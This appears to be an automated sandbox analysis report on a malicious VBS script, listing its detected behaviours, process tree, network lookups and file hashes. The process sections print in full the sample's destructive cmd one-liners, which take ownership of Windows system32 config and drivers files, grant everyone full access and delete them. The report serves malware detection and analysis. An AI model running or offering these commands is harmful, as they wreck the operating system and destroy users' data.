Malware Analysis Report

2024-11-16 12:51

Sample ID 240815-1dg3eazfkj
Target file.vbs
SHA256 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27

Threat Level: Likely malicious

The file file.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:31

Reported

2024-08-15 21:34

Platform

win7-20240708-en

Max time kernel

121s

Max time network

125s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1664 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1664 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 568 wrote to memory of 2760 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 568 wrote to memory of 2760 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 568 wrote to memory of 2760 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 568 wrote to memory of 2984 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 568 wrote to memory of 2984 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 568 wrote to memory of 2984 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2760 wrote to memory of 2656 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2760 wrote to memory of 2656 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2760 wrote to memory of 2656 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2984 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2984 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2984 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2760 wrote to memory of 2728 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2760 wrote to memory of 2728 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2760 wrote to memory of 2728 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2984 wrote to memory of 2232 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2984 wrote to memory of 2232 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2984 wrote to memory of 2232 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\UnprotectAssert.vbs

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 b39eb8682deec9c7a7edcb64512655b0
SHA1 d412384d9cfd8ec2333146eb1dd6c137543dabc7
SHA256 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
SHA512 539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625

C:\Users\Admin\Desktop\ConvertFromImport.vbs

MD5 4b91264568ac2162700be36338c095e8
SHA1 c95726edf8303e6adabcb12ffdca90b51349990a
SHA256 2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512 e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:31

Reported

2024-08-15 21:34

Platform

win10v2004-20240802-en

Max time kernel

139s

Max time network

133s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 b39eb8682deec9c7a7edcb64512655b0
SHA1 d412384d9cfd8ec2333146eb1dd6c137543dabc7
SHA256 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
SHA512 539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625

C:\Users\Admin\Desktop\CheckpointWait.vbs

MD5 4b91264568ac2162700be36338c095e8
SHA1 c95726edf8303e6adabcb12ffdca90b51349990a
SHA256 2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512 e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b